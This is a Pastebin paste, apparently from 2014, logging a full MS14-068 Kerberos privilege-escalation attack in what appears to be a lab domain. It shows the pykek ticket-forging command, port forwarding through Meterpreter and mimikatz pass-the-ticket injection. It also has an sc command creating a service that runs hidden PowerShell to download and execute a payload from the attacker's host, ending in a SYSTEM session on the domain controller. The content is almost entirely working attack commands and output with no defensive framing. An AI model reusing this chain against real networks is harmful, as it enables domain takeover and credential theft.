SHARE
TWEET

MS14-068 Metasploit PoC

a guest Dec 5th, 2014 1,466 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. git clone https://github.com/bidord/pykek
  2. echo 127.0.0.1 msfdc01.metasploitable.local >> /etc/hosts
  3.  
  4. [*] [2014.12.05-23:43:51] 172.16.80.100    web_delivery - Delivering Payload
  5. [*] [2014.12.05-23:43:53] Sending stage (770048 bytes) to 172.16.80.100
  6. [*] Meterpreter session 12 opened (172.16.80.225:4444 -> 172.16.80.100:57204) at 2014-12-05 23:44:12 +0000
  7.  
  8. 20141205-23:44 - 192.168.153.129 exploit(payload_inject) > sessions -i 12
  9. [*] Starting interaction with 12...
  10.  
  11. meterpreter > portfwd add -l 88 -p 88 -r 172.16.80.10
  12. [*] Local TCP relay created: 0.0.0.0:88 <-> 172.16.80.10:88
  13.  
  14. python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066-1105
  15.   [+] Building AS-REQ for msfdc01.metasploitable.local... Done!
  16.   [+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
  17.   [+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
  18.   [+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
  19.   [+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
  20.   [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
  21.   [+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
  22.   [+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
  23.   [+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
  24.  
  25. meterpreter > getuid
  26. Server username: METASPLOITABLE\User01
  27. meterpreter > sysinfo
  28. Computer        : MSFTS01
  29. OS              : Windows 8.1 (Build 9600).
  30. Architecture    : x64 (Current Process is WOW64)
  31. System Language : en_GB
  32. Meterpreter     : x86/win32
  33. meterpreter > shell
  34. Process 4232 created.
  35. Channel 1 created.
  36. Microsoft Windows [Version 6.3.9600]
  37. (c) 2013 Microsoft Corporation. All rights reserved.
  38.  
  39. C:\Windows\system32\WindowsPowerShell\v1.0>whoami /user
  40. whoami /user
  41.  
  42. USER INFORMATION
  43. ----------------
  44.  
  45. User Name             SID                                          
  46. ===================== ==============================================
  47. metasploitable\user01 S-1-5-21-2928836948-3642677517-2073454066-1105
  48.  
  49. C:\Windows\system32\WindowsPowerShell\v1.0>net use \\msfdc01\admin$
  50. net use \\msfdc01\admin$
  51. The password is invalid for \\msfdc01\admin$.
  52.  
  53. Enter the username for 'msfdc01': System error 1223 has occurred.
  54.  
  55. The operation was cancelled by the user.
  56.  
  57. c:\test>exit        
  58. meterpreter > cd c:/test
  59. meterpreter > upload /root/TGT_user01@metasploitable.local.ccache c:/test/TGT_user01@metasploitable.local.ccache
  60. [*] uploading  : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
  61. [*] uploaded   : /root/TGT_user01@metasploitable.local.ccache -> c:/test/TGT_user01@metasploitable.local.ccache
  62. meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"kerberos::ptc TGT_user01@metasploitable.local.ccache" exit'
  63. Process 3600 created.
  64. Channel 3 created.
  65. meterpreter > shell
  66. Process 3948 created.
  67. Channel 4 created.
  68. Microsoft Windows [Version 6.3.9600]
  69. (c) 2013 Microsoft Corporation. All rights reserved.
  70.  
  71. c:\test>net use \\msfdc01\admin$
  72. net use \\msfdc01\admin$
  73. The password is invalid for \\msfdc01\admin$.
  74.  
  75. Enter the username for 'msfdc01': System error 1223 has occurred.
  76.  
  77. The operation was cancelled by the user.
  78.  
  79.  
  80. c:\test>klist
  81. klist
  82. 'klist' is not recognized as an internal or external command,
  83. operable program or batch file.
  84.  
  85. c:\test>mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit
  86. mimikatz "kerberos::ptc TGT_user01@metasploitable.local.ccache" exit
  87.  
  88.   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 20 2014 01:35:45)
  89.  .## ^ ##.  
  90.  ## / \ ##  /* * *
  91.  ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  92.  '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  93.   '#####'                                     with 15 modules * * */
  94.  
  95.  
  96. mimikatz(commandline) # kerberos::ptc TGT_user01@metasploitable.local.ccache
  97.  
  98. Principal : (01) : user01 ; @ METASPLOITABLE.LOCAL
  99.  
  100. Data 0
  101.            Start/End/MaxRenew: 05/12/2014 23:42:03 ; 06/12/2014 09:41:58 ; 12/12/2014 23:41:58
  102.            Service Name (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
  103.            Target Name  (01) : krbtgt ; METASPLOITABLE.LOCAL ; @ METASPLOITABLE.LOCAL
  104.            Client Name  (01) : user01 ; @ METASPLOITABLE.LOCAL
  105.            Flags 50a00000    : pre_authent ; renewable ; proxiable ; forwardable ;
  106.            Session Key       : 0x00000017 - rc4_hmac_nt      
  107.              d5c7022a905e9c71deed80c28940a27d
  108.            Ticket            : 0x00000000 - null              ; kvno = 2        [...]
  109.            * Injecting ticket : OK
  110.  
  111. mimikatz(commandline) # exit
  112. Bye!
  113.  
  114. c:\test>net use \\msfdc01\admin$
  115. net use \\msfdc01\admin$
  116. The command completed successfully.
  117.  
  118.  
  119. c:\test>sc \\msfdc01\ create test binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('ht^C                              
  120. Terminate channel 4? [y/N]  n
  121.  
  122.  
  123. c:\test>
  124.  
  125. c:\test>sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
  126. sc \\msfdc01\ create test_ptc binPath= "cmd.exe /c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.80.225:8080/'))"
  127. [SC] CreateService SUCCESS
  128.  
  129. c:\test>sc \\msfdc01\ start test_ptc
  130. sc \\msfdc01\ start test_ptc
  131. ^Z
  132. Background channel 4? [y/N]  y
  133.  
  134. meterpreter >
  135. meterpreter > background
  136. [*] Backgrounding session 12...
  137. 20141205-23:49 - 192.168.153.129 exploit(payload_inject) > sessions
  138.  
  139. Active sessions
  140. ===============
  141.  
  142.   Id  Type                   Information                      Connection
  143.   --  ----                   -----------                      ----------
  144.   3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ MSFDC01    172.16.80.225:4444 -> 172.16.80.10:60843 (172.16.80.10)
  145.   12  meterpreter x86/win32  METASPLOITABLE\User01 @ MSFTS01  172.16.80.225:4444 -> 172.16.80.100:57204 (172.16.80.100)
  146.  
  147. 20141205-23:49 - 192.168.153.129 exploit(payload_inject) >
  148. [*] [2014.12.05-23:49:18] 172.16.80.10     web_delivery - Delivering Payload
  149. [*] [2014.12.05-23:49:19] Sending stage (770048 bytes) to 172.16.80.10
  150. [*] Meterpreter session 13 opened (172.16.80.225:4444 -> 172.16.80.10:60961) at 2014-12-05 23:49:35 +0000
  151.  
  152. 20141205-23:50 - 192.168.153.129 exploit(payload_inject) > sessions -i 13
  153. [*] Starting interaction with 13...
  154.  
  155. meterpreter > getuid
  156. Server username: NT AUTHORITY\SYSTEM
  157. meterpreter > sysinfo
  158. Computer        : MSFDC01
  159. OS              : Windows 2008 (Build 6002, Service Pack 2).
  160. Architecture    : x86
  161. System Language : en_GB
  162. Meterpreter     : x86/win32
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top